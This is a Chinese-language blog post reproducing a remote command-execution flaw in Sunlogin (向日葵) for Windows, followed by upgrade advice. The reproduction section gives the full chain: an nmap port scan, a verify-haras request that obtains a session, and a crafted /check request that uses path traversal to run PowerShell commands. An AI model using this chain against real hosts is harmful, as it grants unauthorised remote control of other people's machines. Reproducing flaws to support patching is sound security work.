CNVD-2022-03672CNVD-2022-10270:向日葵简约版向日葵个人版for Windows命令执行漏洞复现及修复建议

CNVD-2022-03672CNVD-2022-10270:向日葵简约版向日葵个人版for Windows命令执行漏洞复现及修复建议,第1张

CNVD-2022-03672/CNVD-2022-10270:向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议

本文仅为验证漏洞,在本地环境测试验证,无其它目的


漏洞编号:

CNVD-2022-03672/CNVD-2022-10270


漏洞说明:

向日葵是一款免费的集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。


2022年2月5日,CNVD公开向日葵简约版存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。


2022年2月15日,CNVD公开向日葵个人版for Windows存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。



漏洞影响范围:
  • 向日葵个人版 for Windows <= 11.0.0.33
  • 向日葵简约版 <= V1.0.1.43315(2021.12)

漏洞级别:

高危


漏洞复现:

此处演示向日葵个人版,简约版没找到旧的安装包
版本:

  1. 使用nmap扫描工具,扫描向日葵所在目标机IP,查看开放端口:】

    nmap -p 40000-65535 192.168.32.129
    
  2. 可以看到,部署向日葵的目标机开放了如下端口:

  3. 依次通过浏览器访问ip+端口,直到出现如下图所示,在此环境中访问49200端口即出现JSON信息:

    IP:49200/
    

  4. 尝试获取session,先测试目标机器是否存在/cgi-bin/rpc界面,浏览器继续访问:

    IP:49200/cgi-bin/rpc
    

  5. 测试存在界面后,打开BP,浏览器加BP代理,在BurpSuite中获取刚才访问的界面,选择【Send to Repeater】:

  6. 修改数据包为POST,并传入数据:action=verify-haras,点击【Send】,即可获取到session:

  7. 修改数据包,添加session,并修改参数进行命令执行,下方ipconfig可进行修改为其他参数进行测试,例如替换为whoami:

    GET /check?	cmd=ping../../../Windows/System32/WindowsPowerShell/v1.0/powershell.exe+%20ipconfig 	HTTP/1.1
    Host: 192.168.32.129:54107
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Cookie:CID=dmPqDgSa8jOYgp1Iu1U7l1HbRTVJwZL3
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    
    


漏洞修复:

参考【贝锐】

  1. PC端用户可通过官网直接升级到最新版本

  2. 通过软件检查更新

    (1)向日葵远程控制

    (2)蒲公英异地组网

    (3)花生壳内网穿透

  3. 开启软件自动更新

    向日葵远程控制

    • 打开设置
    • 选择常规设置
    • 找到软件更新选项,并将更新选项修改为:自动更新

欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/langs/564344.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-04-06
下一篇 2022-04-06

发表评论

登录后才能评论

评论列表(0条)

保存